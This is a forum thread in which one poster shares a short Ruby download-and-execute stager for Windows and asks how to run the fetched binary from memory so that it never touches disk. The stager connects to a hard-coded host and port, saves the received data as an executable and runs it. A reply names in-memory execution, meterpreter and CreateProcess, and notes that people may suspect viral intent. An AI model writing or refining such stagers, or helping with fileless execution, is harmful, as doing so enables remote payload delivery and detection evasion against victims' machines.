Thread: upload stager... technique?

  1. #1
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    upload stager... technique?

    I'll try to explain the best I can... (win32)

    upload.exe.rb
    Code:
    require 'socket'

    # TCPSocket.open takes (host, port); the original had the two arguments reversed
    sock = TCPSocket.open('192.168.1.5', 666)
    # read data from the socket until the peer closes, then write it to a file...
    data = sock.read
    sock.close
    # rstrip would strip trailing whitespace bytes from a binary, so the data is written as-is
    destFile = File.open('c:\someplace\file.exe', "wb")
    destFile.write data
    destFile.close

    puts "executing payload"
    # single quotes keep the backslashes literal; in a double-quoted string "\s" is a space and "\f" a form feed
    # (renamed from `exec`, which shadowed Kernel#exec; a new Thread starts on creation, so Thread#run is not needed)
    runner = Thread.new { system 'c:\someplace\file.exe' }

    sleep 100 # stay alive for a long time
    This is a very simple download-and-execute function... this client will read data from a host, write this data to a file and then execute the file...

    So, now you have 2 processes running (client.exe and file.exe). Instead of writing this data to a file I would like to execute this data from within client.exe.

    I don't want file.exe touching the hard drive, I just want to execute the binary data...

    Any ideas to better my search results?

  2. #2
    Very good friend of the forum Gitsnik
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851


    What you are trying to do is execute a program from a memory location.

    I don't know how ruby does it (meterpreter is written in C, perhaps C++ if my SVN logs are correct), but doing it via a C call is "CreateProcess" and pointing the file pointer at a memory location - or something very similar.

    Side Note: A lot of people immediately assume viral intent when you write one of these, be careful where you start googling this information!
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.
